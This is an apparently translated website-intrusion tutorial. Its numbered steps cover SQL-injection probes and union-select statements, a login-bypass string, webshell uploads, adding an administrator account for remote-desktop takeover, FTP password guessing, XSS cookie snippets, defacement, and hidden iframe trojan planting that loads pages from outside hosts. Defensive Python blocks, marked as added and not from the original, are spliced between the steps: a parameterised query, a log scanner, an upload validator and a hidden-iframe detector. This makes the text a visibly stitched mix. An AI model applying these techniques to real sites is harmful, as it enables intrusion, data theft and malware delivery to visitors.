Website intrusion Ideas (primary hacker penetration) Author: 80

Source: Internet
Author: User

1. Classic injection
To determine whether a site has an injection point, append probes such as ', and 1=1, and 1=2, +and+1=1, +and+1=2, %20and%201=1 or %20and%201=2 to the parameter. If and 1=1 returns the normal page while and 1=2 returns an error or "not found", there is an injection point.
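As an added example that is not part of the original page, the following Python shows why the and 1=1 / and 1=2 probe above works against a concatenated query and why it stops working once the id is bound as a parameter or validated as an integer; the table, the id 127 and the function names are constructed for this demonstration.

```python
import sqlite3

# Constructed stand-in for a "show24.asp?id=127" style product lookup; not from the page.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO product VALUES (127, 'widget')")
    return conn

def lookup_concat(conn: sqlite3.Connection, raw_id: str):
    # Vulnerable pattern: the query-string value is spliced into the SQL text,
    # so "127 and 1=1" / "127 and 1=2" rewrite the WHERE clause itself.
    sql = "SELECT name FROM product WHERE id=" + raw_id
    return conn.execute(sql).fetchone()

def lookup_param(conn: sqlite3.Connection, raw_id: str):
    # Hardened pattern: the value is bound as a parameter. It can never alter the
    # statement; a non-numeric string simply matches no row (SQLite compares it as text).
    sql = "SELECT name FROM product WHERE id=?"
    return conn.execute(sql, (raw_id,)).fetchone()

def lookup_validated(conn: sqlite3.Connection, raw_id: str):
    # Stricter still: only a well-formed integer ever reaches the database.
    if not raw_id.strip().lstrip("-").isdigit():
        return None
    return lookup_param(conn, raw_id.strip())

def probe_difference(lookup) -> bool:
    # The signal the page describes: "and 1=1" gives the normal page while "and 1=2"
    # gives an error or empty page. True means the endpoint is injectable.
    conn = make_db()
    normal = lookup(conn, "127 and 1=1")
    broken = lookup(conn, "127 and 1=2")
    return normal is not None and broken is None
```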
2. Universal password ("or" vulnerability)
The universal password ' or ' = ' or ' can be entered in the backend management login. On some sites there is no input filtering, so this "or" vulnerability lets you log straight in. The vulnerability is generally found on ASP sites.
3. Database exposure (暴库)
Database exposure can be understood as forcing the site to reveal its database so that it can be downloaded; with an exposure tool you can directly obtain the administrator user name and password. %5c is the hexadecimal encoding of the \ symbol. A database above version 5.0 can also be exposed; for example in PHP manual advanced injection, the version() variable tells you the site's database version. If a site's database is above 5.0 and it is an Access database, and the submission address is http://www.xxx.com/rpc/show24.asp?id=127, add %5c directly after rpc, because %5c marks a second-level directory, giving http://www.xxx.com/rpc%5c/show24.asp?id=127. Likewise %23 stands for #: if the administrator renamed the database to #database.mdb to prevent others from downloading it, and the page address is http://www.xx.com/rpd/#database.mdb, replace # with %23: http://www.xx.com/rpd/%23database.mdb
4. Cookie relay: "SQL anti-injection program reminds you that your IP has been recorded"
If, while testing a site, a dialog box pops up with the SQL anti-injection warning above, cookie relay (injection relay) can be used to break through. The method: set up a local ASP environment (the target must also be an ASP site), open the relay tool, paste the address of the target page into it, fill in the values exactly as they are, generate, and put the generated file into the directory. Next open the browser and enter http://127.0.0.1:(port)/directory/file; if it loads normally, enter http://127.0.0.1:(port)/directory/file?value, submit the value, and then let the tool guess the table names and column names.
5. Manual injection
ASP manual statements:
Table name: and exists (select * from table_name)
Column name: and (select count(column_name) from table_name) > 0
Length: and (select top 1 len(username) from admin) > 0
Content: and (select top 1 asc(mid(username,1,1)) from admin) > 100
PHP manual statements: order by (guess the field count); and 1=2 union select (number of fields); and 1=2 union select ... from (position)
If there are 30 fields, then after the injected address http://www.xxx.com/showfo.jsp?id=130 enter: and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
Several common variables: user(), version() (database version), database() (database name)
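Added here as a defender-side example (not from the page): a small scanner that looks for the probe strings from items 1, 2, 3 and 5 in web-server access logs, decoding + and %20 first so the "+and+1=1" and "%20and%201=1" spellings are caught, while checking %5c and %23 on the raw path. The log lines, IP addresses and paths are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures built from the probe strings listed on this page (items 1, 2, 3 and 5).
SIGNATURES = {
    "boolean_probe":      re.compile(r"\b(?:and|or)\s+1\s*=\s*[12]\b", re.I),
    "universal_password": re.compile(r"'\s*or\s*'\s*=\s*'", re.I),
    "union_select":       re.compile(r"\bunion\s+select\b", re.I),
    "order_by_guess":     re.compile(r"\border\s+by\s+\d+", re.I),
    "table_guess":        re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "fingerprint_func":   re.compile(r"\b(?:version|database|user)\s*\(\s*\)", re.I),
}
# These two are checked on the raw (still percent-encoded) path, which is how they arrive.
RAW_SIGNATURES = {
    "backslash_path": re.compile(r"%5c", re.I),             # item 3: rpc%5c/
    "hash_db_name":   re.compile(r"%23[^/?]*\.mdb", re.I),  # item 3: %23database.mdb
}
# Combined-log-format line; only the fields used here are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(path: str) -> list:
    """Return the signature names that match one request path."""
    decoded = unquote_plus(path)   # '+' and %20 become spaces, %27 becomes a quote
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    hits += [name for name, rx in RAW_SIGNATURES.items() if rx.search(path)]
    return hits

def scan(lines) -> list:
    """Return (ip, path, hits) for every parsable line that matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := classify(m["path"])):
            findings.append((m["ip"], m["path"], hits))
    return findings

# Constructed sample log lines (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /show24.asp?id=127 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /show24.asp?id=127%20and%201=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /show24.asp?id=127+and+1=2 HTTP/1.1" 500 231',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /rpc%5c/show24.asp?id=127 HTTP/1.1" 500 231',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /rpd/%23database.mdb HTTP/1.1" 200 40960',
    '203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /showfo.jsp?id=130%20and%201=2%20union%20select%201,2,3 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /admin/login.asp?user=%27%20or%20%27%20%3D%20%27 HTTP/1.1" 200 900',
    '198.51.100.7 - - [10/Oct/2023:13:56:00 +0000] "GET /index.asp HTTP/1.1" 200 2048',
]
```

A 200 on the "and 1=1" request paired with a 500 on the "and 1=2" request from the same source is the exact pattern item 1 describes, so alerting on that pair is more useful than on either line alone.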
6. Packet capture to get a Webshell
If you get into the backend and find a database backup function, you can capture the packets of an upload to obtain the upload and get a Webshell. Tools: the packet-capture tool wosck, a picture, an ASP webshell; build your own upload address (upload loading, upfile upload, cookies=()).
7. Database backup to get a Webshell, and one-line Trojan intrusion
Usually, once in the backend and having found a database backup function, take a Webshell: find a place to add a product, upload a large webshell renamed to a .jpg image, then paste the image address into the database backup and give it a name such as shell.asp; visit that address to enter the Webshell. For the one-line Trojan intrusion, first edit the one-line code in Notepad, rename it 2.jpg, back it up through the database backup and visit it; a 500 internal server error proves the one-liner works. Next connect with the one-line Trojan client, get the path page, then rename the webshell, enter the large webshell's content, submit, and get the Webshell.
8. Differential backup under DB permissions to get a Webshell
If a site's injection point is a MySQL database with DB permissions or SA permissions and directories can be listed, it is easy: find the site's directory (usually on the D or E drive), back up a small webshell, and visit its address to see whether it succeeded; backing up the large webshell directly seemingly does not work. After success, enter the large webshell's content and get the Webshell.
9. Finding the backend
The default backend paths are generally admin, admin/admin.asp, admin/login.asp, admin_login.asp, manage/login.asp, login.asp, logon, user.asp and admin/index.asp. Of course these are only the defaults; some large sites do not use admin for the backend, and some hide it very deep. You can simply guess with site:website inurl:backend, download the site's HTML source and analyse it to find the backend, or scan with any of the many available tools.
10. Script hints
Some sites show a script prompt before entering the backend, like an InputBox "" in VB programming, that is, a dialog input box. Enter administrator to get through; admin stands for administrator.
11. PHP backdoor and eWebEditor editor intrusion
PHP backdoor: for example the Disz vulnerability disclosed earlier. Append c.php to a PHP site; if the page shows 1, upload a PHP webshell to get a Webshell. eWebEditor editor intrusion is a very fast method: set the allowed upload file types, upload an .asa or another format, then access it to get the Webshell; if that does not work, add the statement directly to get the Webshell.
12. Upload vulnerability
Some sites have no injection point but do have an upload vulnerability, so how do we use it? First open the upload address to see whether it exists. If it does, try an ASP large webshell; if that fails, try a one-liner and see whether it succeeds. Upload with the Ming boy tool, which has four modes (dynamic network, power, dynamic, Joek); the page address format must match. If the site pops up a dialog box saying the upload succeeded, you can get a Webshell: upload the webshell. If nothing is displayed and the page is simply blank, build two uploads: the first a JPG picture, the second the ASP large webshell; remember to leave a space after the large webshell's name. If the site shows "file type is incorrect, please re-upload", there is a 90% chance of getting a Webshell; only the format is not allowed, so change the suffix, as long as the site does not filter the format. If the site shows "please log in before uploading", you do not have the cookies: register a user on the site, obtain the cookies, and then the upload succeeds.
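As an added defender-side example (not from the page), this Python upload check closes the gaps items 7, 11 and 12 exploit: a script renamed to .jpg, a trailing space after the name, a double extension, an .asa suffix and a path in the file name. The function name, the allowed image set and the executable-extension list are assumptions to adjust per server.

```python
import os
import secrets

# Image types the form is meant to accept, with the leading bytes a real file of that type has.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
# Extensions the page shows being smuggled through upload forms; the server would execute them.
EXECUTABLE = {"asp", "asa", "aspx", "cer", "php", "jsp"}

def check_upload(filename: str, content: bytes):
    """Return (accepted, detail): detail is the reason for rejection, or the name to store under."""
    # 1. Keep only the base name and strip trailing spaces/dots, the trick the page relies on
    #    ("leave a space after the webshell's name") to slip past suffix checks.
    name = os.path.basename(filename.replace("\\", "/")).rstrip(" .")
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"
    exts = parts[1:]
    # 2. An executable extension anywhere in the chain (shell.asp.jpg, shell.jpg.asp) is refused.
    if EXECUTABLE & set(exts):
        return False, "executable extension"
    ext = "jpg" if exts[-1] == "jpeg" else exts[-1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    # 3. The bytes must start like a real image of that type, so a script renamed to .jpg fails.
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    # 4. Never reuse the client's name: store under a random name with the verified extension,
    #    in a directory the web server is configured not to execute scripts from.
    return True, secrets.token_hex(8) + "." + ext
```

A magic-byte check alone does not stop script text appended inside a valid image, so the storage directory must also be one the server never executes from.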
13. Simple privilege escalation to take the server; Serv and pcAnywhere third-party escalation
Simply taking down the server, that is, the host at the site's IP: first we need a Webshell, then look at the component information to see whether any path can be read or written. If there is one, go to the cmd command: first write content into the writable file, execute a command to add an account with the highest administrative rights, then enter netstat -an to get the host's connection ports, then connect over 3389 and turn it into a broiler (a zombie host), which is best, so that we operate more covertly.
14. Reverse-IP lookup, side-site intrusion and social engineering
Reverse-IP intrusion, that is, intrusion through port 21: first ping WWW.XXX.COM to get the IP, then go to a reverse-IP lookup site to check how many domain names share it. Next add the [email protected] address, add a dictionary (collect as many likely passwords as possible, such as 123, 321, 456), then use Streamer to detect the password, log in to ftp://ip with the user and password, change information, and so on. Social engineering takes many forms; obtaining the FTP password also requires collecting information, and not every attempt works; in short, it comes down to your own experience.
15. Cross-site scripting attack
Cross-site scripting (CSS, i.e. XSS) is a passive attack that nowadays requires more thought and experience.
Three classic cross-site snippets:
<script>alert("Cross-site start")</script>
<script>alert(document.cookie)</script>
<script>window.open("http://www.hackgirl.net")</script>
16. Special space
Use Tab to create a special space, then when registering enter that space together with an administrator's name (find a moderator or administrator name on the site) and register with it; sometimes the account you register this way becomes the administrator.
17. Changing the homepage
To change the homepage, get a Webshell, then find the homepage file, generally index.asp, index.php, index.jsp or index.html. Go to the site's root directory, edit index.asp (the homepage), clear it (best to back it up first), enter your own homepage code (the defacement page), save it, and then visit it to see the result you want.
18. Planting a Trojan (挂马)
First, from the Webshell, create a text file and rename it 1.htm, then hang it at the bottom of the page.
Two classic planting snippets:
<iframe src="http://www.xxxx.com/2.htm" width="0" height="0" frameborder="0"></iframe>
<script language="javascript">
window.open("http://www.xxx.com/2.htm", "", "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
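Added as a detection example that is not part of the original page: a stdlib-only Python scanner that flags the two planting patterns above in saved HTML, an iframe sized to 0 (or hidden by style) and an inline script that opens a 1x1 window. The class and function names, the example.com/example.net URLs and the sample fragment are constructed for this example.

```python
import re
from html.parser import HTMLParser

TINY = re.compile(r"^\s*0*[01](px|%)?\s*$")      # a width/height of 0 or 1 (optionally px or %)
POPUP_URL = re.compile(r"""window\.open\s*\(\s*['"]([^'"]*)""")

class HiddenEmbedFinder(HTMLParser):
    """Collects ("hidden-iframe", src) and ("hidden-popup", url) findings while parsing."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None          # buffer for the current <script> body, else None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").lower().replace(" ", "")
            if (TINY.match(a.get("width", "")) or TINY.match(a.get("height", ""))
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._script = ""

    def handle_data(self, data):
        if self._script is not None:
            self._script += data

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = self._script, None
            sizes = re.findall(r"\b(?:width|height)\s*=\s*(\d+)", body, re.I)
            if "window.open" in body and any(int(s) <= 1 for s in sizes):
                m = POPUP_URL.search(body)
                self.findings.append(("hidden-popup", m.group(1) if m else ""))

def find_hidden_embeds(html: str) -> list:
    parser = HiddenEmbedFinder()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed page fragment (not from any real site): the two patterns above plus one benign embed.
SAMPLE_HTML = """
<p>footer</p>
<iframe src="https://example.com/video" width="560" height="315"></iframe>
<iframe src="http://example.net/2.htm" width="0" height="0" frameborder="0"></iframe>
<script language=javascript>
window.open ("http://example.net/2.htm", "", "Toolbar=no,location=no,width=1,height=1 ");
</script>
"""
```

Running this over a site's pages after a suspected compromise (or on each deploy, against the files in the web root) surfaces the injected 1.htm/2.htm references that a visual check of the page misses.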
19. Google search statements (many)
inurl:asp?id=, inurl:show.asp, inurl:went.asp, inurl:jsp?id=, inurl:php?id=
20. Finding vulnerabilities yourself
Based on your own technical experience and accumulation, look for vulnerabilities that have not yet been found (a matter of thinking).
